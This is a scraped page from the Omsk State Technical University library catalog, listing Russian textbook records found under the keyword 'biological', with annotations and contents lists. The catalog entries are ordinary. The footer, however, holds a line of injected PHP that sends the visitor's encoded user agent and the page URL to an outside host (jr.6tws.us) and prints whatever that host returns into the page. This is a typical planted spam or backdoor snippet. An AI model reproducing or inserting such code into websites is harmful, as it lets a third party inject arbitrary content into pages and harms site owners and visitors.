Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

59 пользователей


Зарегистрированных: 1 

Киршин Александр Александрович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БИОЛОГИЧЕСКИЙ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 123
1. 
Гофман, Александр Бенционович. 7 лекций по истории социологии [Текст] : учеб. пособие для вузов / А. Б. Гофман, 2005. - 237, [1] с.

В книге рассматриваются основные принципы истории социологии; анализируются ключевые идеи, из которых сформировалась социология и благодаря которым предыстория этой дисциплины превратилась в ее историю; представлены интеллектуальные портреты некоторых классиков социологической мысли (Огюста <Конта>, Карла <Маркса>, Эмиля <Дюркгейма>, Вильфредо <Парето>) и отдельные направления <социологического> <редукционизма> (<социальный> <дарвинизм> и <расово-антропологическая> <школа>).

Издание соответствует общей программе курса истории социологии и адресовано преподавателям, студентам и аспирантам вузов, равно как и широкому кругу читателей.

2. 
Реальность и прогнозы искусственного интеллекта [Текст] : сб. науч.-попул. ст.: пер. с англ. / под ред. : В. Л. Стефанюка, 1987. - 247 с.
Держатели документа (Информация об экземплярах) 
3. 
Рузавин, Георгий Иванович. Концепции современного естествознания [Текст] : учеб. для вузов / Г. И. Рузавин, 2005. - 286, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ОТНОСИТЕЛЬНОСТЬ -- НЕОПРЕДЕЛЕННОСТЬ -- НЕОБРАТИМОСТЬ -- ТЕРМОДИНАМИКА -- БЕСКОНЕЧНОСТЬ -- ВСЕЛЕННАЯ -- АТОМИЗМ -- БИОСФЕРА -- ЭКОЛОГИЯ -- САМООРГАНИЗАЦИЯ -- СИСТЕМНЫЙ -- МЕТОД -- САМООРГАНИЗАЦИЯ -- ТЕОРИЯ СИСТЕМ -- атом -- гравитация -- законы механики -- координаты -- механицизм -- метод принципов -- симметрия -- состояние -- экспериментальный метод -- аксиоматический метод -- гипотеза -- дальнодействие -- квант энергии -- количественный метод -- механическая картина мира -- натуральная философия -- скорость -- электромагнитная картина мира -- декартовы координаты -- искривление луча света -- преобразование лоренца -- поле тяготения -- система отсчета -- инерциальная система -- преобразование галилея -- принцип относительности -- эфир -- вероятность -- дуализм -- микромир -- принцип дополнительности -- элементарные частицы -- волна -- корпускула -- макромир -- мегамир -- принцип неопределенности -- фотоэффект -- дуализм волны и частицы -- детерминизм -- закон -- случайность -- возможность -- достоверность -- индетерминизм -- лапласовский детерминизм -- причина -- статистика -- вещество -- закрытая система -- дезорганизация -- информация -- неравновесность -- энергия -- время -- информация -- организация -- открытая система -- термодинамика -- энтропия -- антивещество -- большой взрыв вселенной -- галактика -- гравитация -- микроэволюция -- расширение вселенной -- стандартная модель -- физическое взаимодействие -- планетарная модель атома -- вселенная -- красное смещение -- макроэволюция -- реликтовое излучение -- адроны -- антинейтроны -- кварк -- молекула -- электрон -- фотон -- редукция -- анализ -- катализатор -- структурная формула -- атомный номер -- изотоп -- органический синтез -- простое вещество -- химический элемент -- аминокислоты -- белок -- витализм -- генетическая информация -- классификация -- клетка -- мутация -- нуклеиновые кислоты -- днк -- рнк -- хиральность -- эукариоты -- биоценоз -- вирус -- геном -- метаболизм -- прокариоты -- редукционизм -- автотрофы -- биом -- принцип реди -- экологическая система -- экосфера -- ароморфоз -- биологический процесс -- изоляция -- селекция -- наследственность -- телеология -- факторы эволюции -- естественный отбор -- модификация -- синтетическая теория -- эволюция -- бифуркация -- диссипативные структуры -- флуктуация -- аддиктивность -- схоластика -- детерминизм -- математическое моделирование -- системный анализ

Учебник подготовлен в соответствии с Государственным образовательным стандартом высшего профессионального образования и предназначен для студентов гуманитарных специальностей вузов.

Освещаются важнейшие концепции современного естествознания, имеющие важное значение для формирования научного мировоззрения и общей культуры студентов.

4. 
Перепелов, Александр Николаевич. Психология и педагогика [Текст] : Конспект лекций / А. Н. Перепелов, Т. В. Савченко, 2005. - 124 с.
Ключевые слова 
Оглавление 
  • Предисловие. - с.6
  • Психология. - с.8
  • Введение. - с.8
  • Предмет и задачи психологической науки и практики. - с.8
  • Объект и предмет психологии. - с.8
  • Задачи психологической науки. - с.9
  • Основные направления психологии. - с.10
  • Психологический анализ деятельности. - с.12
  • Виды и развитие человеческой психики. - с.12
  • Виды человеческой деятельности. - с.14
  • Деятельность и психические процессы. - с.14
  • Структура деятельности человека. - с.16
  • Формы психической активности. - с.16
  • Сенсомоторные процессы. - с.18
  • Речевое общение. - с.19
  • Зарождение и развитие психики. - с.20
  • Функции психики. - с.20
  • Уровни и стадии двигательной активности. - с.21
  • Развитие высших психических функций у человека. - с.22
  • Уровни отражения действительности и развития психики человека. Происхождение и развитие сознания. - с.23
  • Сознание - высший уровень отражения действительности. - с.23
  • Особенности психического отражения действительности. - с.24
  • Сознание и бессознательное. - с.26
  • Чувственная и рациональная познавательная деятельность человека. - с.28
  • Познавательная деятельность человека. - с.28
  • Понятие об ощущении и его физиологической основе. - с.28
  • Виды ощущений. - с.29
  • Общие свойства ощущений. - с.32
  • Восприятие. Основные качества восприятия. - с.32
  • Мышление и воображение как формы познавательной деятельности. - с.35
  • Функции мышления. - с.35
  • Виды мышления и мыслительные операции. - с.36
  • Речь как инструмент мышления. - с.38
  • Воображение. Функции воображения. - с.38
  • Общее понятие о внимании. - с.40
  • Свойства внимания. - с.40
  • Функции и виды внимания. - с.42
  • Память. - с.43
  • Функции и виды памяти. - с.43
  • Классификация теорий памяти. - с.44
  • Процессы памяти. - с.49
  • Психология мотиваций и эмоций. - с.51
  • Виды мотивов. - с.51
  • Общая характеристика эмоциональных процессов. - с.52
  • Психологические теории и эмоции. - с.54
  • Воля. - с.56
  • Воля как характеристика сознания. - с.56
  • Волевая регуляция поведения. - с.58
  • Структура волевого действия. - с.59
  • Психология личности. - с.60
  • Понятие о личности в психологии. - с.60
  • Современные теории личности. - с.61
  • Формирование и развитие личности. - с.63
  • Темперамент - биологический фундамент личности. - с.64
  • Типы и свойства темпераментов. - с.65
  • Роль темперамента в трудовой и учебной деятельности. - с.67
  • Характер. - с.67
  • Структура характера. - с.67
  • Акцентуация черт характера. - с.68
  • Природные и социальные предпосылки характера. - с.69
  • Способности. - с.71
  • Понятие о способностях. - с.71
  • Задатки и талант. - с.72
  • Развитие способностей. - с.73
  • Психология управления. - с.74
  • Психологические основы управленческой деятельности. - с.74
  • Особенности межличностного взаимодействия и общения в группе. - с.74
  • Стили руководства и лидерства. Критерии оценки деятельности руководителя. - с.76
  • Педагогика. - с.79
  • Введение. - с.79
  • Педагогика в системе наук о человеке. - с.79
  • Общее представление о педагогике как науке. - с.79
  • Образование, его сущность и проблемы. - с.84
  • Педагогический процесс как система и целостное явление. - с.87
  • Характеристика обучения как дидактического процесса. - с.89
  • Сущность, функции и структура процесса обучения. - с.89
  • Методы, средства и формы организации педагогического процесса. - с.93
  • Современные теории и концепции обучения. - с.98
  • Воспитание в целостном учебно-педагогическом процессе. - с.101
  • Сущность, содержание, организация воспитания. - с.101
  • Семья как социокультурная среда развития и формирования личности. - с.104
  • Способы воспитательного воздействия на человека. - с.106
  • Педагогические технологии. - с.108
  • Подходы к пониманию технологии и ее сущность. - с.108
  • Технология организации взаимодействия в обучении. - с.112
  • Технология эффективной воспитательной деятельности руководителя. - с.114
  • Терминологический словарь. - с.118
  • Библиографический список. - с.123
Держатели документа (Информация об экземплярах) 

В доступной и краткой форме раскрываются основные аспекты дисциплины "Психология и педагогика". Конспект лекций составлен в соответствии с Государственным образовательным стандартом РФ ВПО, действующим федеральным компонентом по курсу "Общие гуманитарные и социально-экономические дисциплины".

Предназначен для студентов дистанционного обучения всех специальностей, изучающих базовый курс психологии и педагогики.

Полный текст
5. 
Биологический контроль окружающей среды: биоиндикация и биотестирование [Текст] : учеб. пособие для вузов по направлению "Биология" и биол. специальностям / под ред. О. П. Мелеховой, Е. И. Егоровой, 2007. - 287, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены теоретические основы и методология биологической диагностики окружающей среды. Входящие в пособие лабораторные работы (более 40) содержат современные методы биоиндикации и биотестирования. Книга по структуре и содержанию представляет собой основу практикума к таким дисциплинам, как "Экология" и "Биологический мониторинг", входящим в учебные планы многих специальностей биолого-экологической направленности.

6. 
Шварц, Валерий Борисович. Медико-биологические аспекты спортивной ориентации и отбора [Текст] / В. Б. Шварц, С. В. Хрущев, 1984. - 150, [1] с.
Держатели документа (Информация об экземплярах) 
7. 
Корчагин, Владимир Николаевич. Защита растений от вредителей и болезней на садово-огородном участке [Текст] : справочник / В. Н. Корчагин, 1987. - 316, [2] с.
Держатели документа (Информация об экземплярах) 
8. 
Константинова, Галина Михайловна. Щитовки - вредители плодовых и декоративных растений [Текст] / Г. М. Константинова, Э. Ф. Козаржевская, 1990. - 156, [2] с.
Держатели документа (Информация об экземплярах) 
9. 
Лафи, Светлана Григорьевна. Основы биологической эволюции и генетики [Текст] : учеб. пособие для вузов по специальности 030301 "Психология труда и организационная психология" заоч. и дистанц. форм обучения / С. Г. Лафи, 2008. - 64 с.
Оглавление 
  • Введение. - с.3
  • Теоретико-методологические основы курса. - с.4
  • Актуальность, предмет и задачи курса. - с.4
  • Введение в проблему. Биология - наука о жизни. - с.4
  • Свойства жизни. - с.5
  • Уровни организации живой материи. Живая природа как иерархическая система. - с.6
  • Методические указания к самостоятельной работе. - с.7
  • Молекулярно-биологический уровень организации жизни. - с.8
  • Химические элементы и их роль в функционировании живых организмов. - с.8
  • Неорганические соединения. - с.9
  • Органические соединения. - с.10
  • Методические указания к самостоятельной работе. - с.11
  • Макромолекулы жизни. - с.11
  • Белки, их строение и функции в организме. - с.11
  • Углеводы, их функции в организме. - с.15
  • Липиды, их функции в организме. - с.15
  • Нуклеиновые кислоты, их виды и функции в организме. - с.17
  • Методические указания к самостоятельной работе. - с.18
  • Клеточный уровень организации жизни. - с.18
  • Клетка - элементарная единица всего живого. - с.18
  • Основы клеточной теории. - с.19
  • Размножение, его роль в природе. Половое и бесполое размножение организмов. Митоз и мейоз. Строение и функции хромосом. - с.22
  • Методические указания. - с.26
  • Генетический уровень организации жизни. - с.29
  • Классическая генетика и ее роль в развитии генетики человека. - с.29
  • Основные методы изучения генетической организации человека. - с.32
  • Методические указания. - с.33
  • Мутационная изменчивость. - с.35
  • Мутации как материал для естественного и искусственного отбора. - с.35
  • Закон гомологических рядов Н. И. Вавилов. - с.37
  • Мутации как материал для естественного и искусственного отбора. - с.37
  • Методические указания. - с.38
  • Онтогенетический, популяционный и биогеоценотический уровни организации жизни. - с.39
  • Онтогенетический уровень. - с.39
  • Популяционный уровень организации жизни. - с.40
  • Биогеоценотический уровень организации жизни. - с.41
  • Методические указания. - с.45
  • Основные гипотезы происхождения и эволюционирования жизни. - с.47
  • Теория возникновения и эволюционирования жизни. - с.47
  • Эволюционное учение. - с.49
  • Системная теория эволюции. - с.57
  • Методические указания. - с.58
  • Контрольные вопросы по дисциплине "Основы биологической эволюции и генетики". - с.60
  • Библиографический список. - с.61
  • Список электронных учебных пособий. - с.62
Держатели документа (Информация об экземплярах) 

В учебном пособии излагаются основы биологической эволюции и генетики. Его целью является создание представления о биологической организации жизни вообще и человека в частности, формирование естественно-научной базы для освоения других учебных дисциплин: зоопсихологии, психофизиологии, психогенетики и др.

Полный текст
10. 
Колесников, Сергей Ильич. Основы экологии для инженеров [Текст] / С. И. Колесников, 2003. - 346 с.
Держатели документа (Информация об экземплярах) 

Учебное пособие написано в соответствии с государственным общеобразовательным стандартом и программой по экологии, рекомендованной Минобразования РФ. Книга состоит из четырех частей: общая экология, учение о <биосфере>, экология <человека>, <рациональное> <природопользование> и <охрана> <окружающей среды>. В учебное пособие включен учебно-методический материал в виде текста по экологии с ответами.

11. 
Абелева, Изабелла Юрьевна. Речь о речи. Коммуникативная система человека [Текст] / И. Ю. Абелева, 2004. - 301, [1] с.

Рассматриваются теория и практика <речевой деятельности>. Представлены ее <биологический>, <культурно-исторический> и <лингвистический> аспекты. Подробно освещаются исполнительные механизмы <коммуникативной> <системы> <человека>; порождение и <восприятие> <устных> и <письменных> <сообщений>. Особое внимание уделяется центральному механизму - <внутренней> <речи>, управляющей переработкой информации. Рассматриваются также и возможные "поломки" этих механизмов с привлечением данных из области <невропатологии>, <психиатрии>, <логопедии>, <патопсихологии>. Анализируются собственно <языковые> и <паралингвистические> <средства>, используемые при <общении>. Подчеркивается сходство <речевого> <поведения> разноязычных людей. Кроме того, исследуются стадии формирования и совершенствования речи в индивидуальном становлении человека как <личности>.

Для студентов вузов гуманитарного профиля.

12. 
Круглов, Владимир Васильевич. Искусственные нейронные сети. Теория и практика [Текст] / В. В. Круглов, В. В. Борисов, 2002. - 381, [1] с.
Держатели документа (Информация об экземплярах) 
13. 
Рожков, Николай Федорович. Измерительная диагностическая аппаратура в клинико-физиологических исследованиях. [Текст] : монография / Н. Ф. Рожков, 2001. - 151 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
14. 
Путилов, Аркадий Александрович. "Совы", "жаворонки" и другие [Текст] : О наших внутрен. часах и их влиянии на здоровье и характер / А. А. Путилов, 1997. - 263 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
15. 
Общая экология [Текст] : Учеб. для вузов по экол. специальностям / Авт.-сост. А. С. Степановских, 2002. - 509, [1] с.
Держатели документа (Информация об экземплярах) 

Излагаются главные положения современной экологии, строение и эволюция <биосферы>, роль живого вещества в биосфере. Рассматриваются основные среды жизни и адаптации к ним <организмов>, экологии <популяций>, сообществ и <экосистем>, дается концепция <ноосферы>, освещаются экологические проблемы современности и пути их решения.

16. 
Скрипко, Тамара Васильевна. Основные понятия определения "экология". Ее системность [Текст] : Учеб. пособие / Т. В. Скрипко, 2003. - 116 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

Изложены современные представления об общей экологии, как науке об <экосистемах>. Рассмотрены предмет и методы экологии, среды обитания, разнообразие <биологических сообществ>, <круговороты> энергии и различных веществ в природе, распространение организмов, их реакции, регуляции <численности>, <конкуренция>, сообщество как основная экологическая единица.

Полный текст
17. 
Волькенштейн, Михаил Владимирович. Биофизика [Текст] / М. В. Волькенштейн, 1988. - 591 с.
Ключевые слова 
МОЛЕКУЛЯРНАЯ -- КЛЕТКА -- СЛОЖНАЯ -- СИСТЕМА -- БИОЛОГИЧЕСКАЯ -- ЭВОЛЮЦИЯ -- ФИЗИКА -- МАКРОМОЛЕКУЛЫ -- БЕЛКА -- МЕМБРАНЫ -- ФЕРМЕНТА -- НУКЛЕИНОВОЙ -- КИСЛОТЫ -- БИОСИНТЕЗ -- НЕРВНОГО -- ИМПУЛЬСА -- БИОПОЛИМЕР -- НЕРАВНОВЕСНАЯ -- ТЕРМОДИНАМИКА -- МЕХАНОХИМИЧЕСКИЙ -- ПРОЦЕСС -- ФОТОБИОЛОГИЧЕСКИЙ -- ДИНАМИЧЕСКИЙ -- БИОЛОГИЧЕСКИЙ -- ХИМИЧЕСКИЙ -- ДЫХАТЕЛЬНАЯ -- ЦЕПЬ -- БИОЭНЕРГЕТИКА -- ТОПОЛОГИЯ -- ДНК -- ХИМИЯ -- БИОНЕОРГАНИЧЕСКАЯ -- БИОЛОГИЧЕСКОЕ -- РАЗВИТИЕ -- УЧЕБНИК И ПОСОБИЕ
Держатели документа (Информация об экземплярах) 
18. 
Физическая культура студента [Текст] : Учеб. для вузов / М. Я. Виленский, А. И. Зайцев, В. И. Ильинич и др.; Под ред. В. И. Ильинича, 2003. - 446, [1] с.
Держатели документа (Информация об экземплярах) 

Материал учебника позволяет систематизировать и углубить знания по основам теории и методики <физического воспитания>, необходимые при изучении теоретической части программы учебной дисциплины "Физическая культура". Учебник поможет освоить практические умения и навыки по <укреплению здоровья>, повышению <работоспособности>, организации <здорового образа жизни>. Освещены вопросы методики формирования разностороннего <физического развития> и <спортивного совершенствования>, <психофизической подготовки> студента к будущей профессиональной деятельности.

Для студеентов вузов, будет полезна учащимся средних специальных учебных заведений, колледжей, лицеев.

19. 
Кун, Деннис. Основы психологии [Текст] : Все тайны поведения человека / Д. Кун, 2004. - 863, [1] с.
Ключевые слова 
ПСИХИКА -- РАЗВИТИЕ -- РЕБЕНОК -- ВОСПРИЯТИЕ -- СОЗНАНИЕ -- ПАМЯТЬ -- ПОЗНАНИЕ -- КРЕАТИВНОСТЬ -- УМСТВЕННЫЕ СПОСОБНОСТИ -- МОТИВАЦИЯ -- ЭМОЦИЯ -- ПСИХОПАТОЛОГИЯ -- ПСИХОТЕРАПИЯ -- ГЕНДЕР -- СЕКСУАЛЬНОСТЬ -- СОЦИАЛЬНОЕ -- ПОВЕДЕНИЕ -- ПРИКЛАДНАЯ -- ПСИХОЛОГИЯ -- УЧЕБНАЯ ДЕЯТЕЛЬНОСТЬ -- ПСИХОАНАЛИТИЧЕСКАЯ -- ЭКСПЕРИМЕНТ -- ПСЕВДОПСИХОЛОГИЯ -- АСТРОЛОГИЯ -- ГРАФОЛОГИЯ -- ФРЕНОЛОГИЯ -- ХИРОМАНТИЯ -- НЕРВНАЯ СИСТЕМА -- ДЕПРЕССИЯ -- ПАРАПСИХОЛОГИЯ -- МЕДИТАЦИЯ -- БИОЛОГИЧЕСКИЙ РИТМ -- ГИПНОЗ -- НАРКОТИК -- АЛКОГОЛЬ -- ДЕТЕКТОР ЛЖИ -- ПСИХОЗ -- ТРЕНИНГ -- ЗДОРОВЬЕ -- ТЕСТ -- ТЕРРОРИЗМ -- ПСИХОЛОГИЯ ПЕРСОНАЛА -- СТРЕСС
Держатели документа (Информация об экземплярах) 

Эта книга - своеобразный прорыв в сфере преподавания и изучения психологии.

"Я сделал все возможное, чтобы ваша первая встреча с наукой о человеке доставила вам удовольствие!" Этот авторский девиз красной нитью проходит через все содержание книги: современные знания излагаются в увлекательном, интригующем ключе, множество примеров, цитат, рубрик, описаний экспериментов превращают чтение этого учебника в неповторимое удовольствие.

Эта книга познакомит вас со всеми современными разделами психологии и откроет вам многие тайны психики и поведения человека, увлечет романтикой исследований в одной из самых молодых и интересных наук двадцать первого века.

20. 
Биологический энциклопедический словарь [Текст] / Редкол.: А. А. Баев и др., 1995. - 864 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2874 - 23.04.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.02 с.12 запросов, 0.48c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;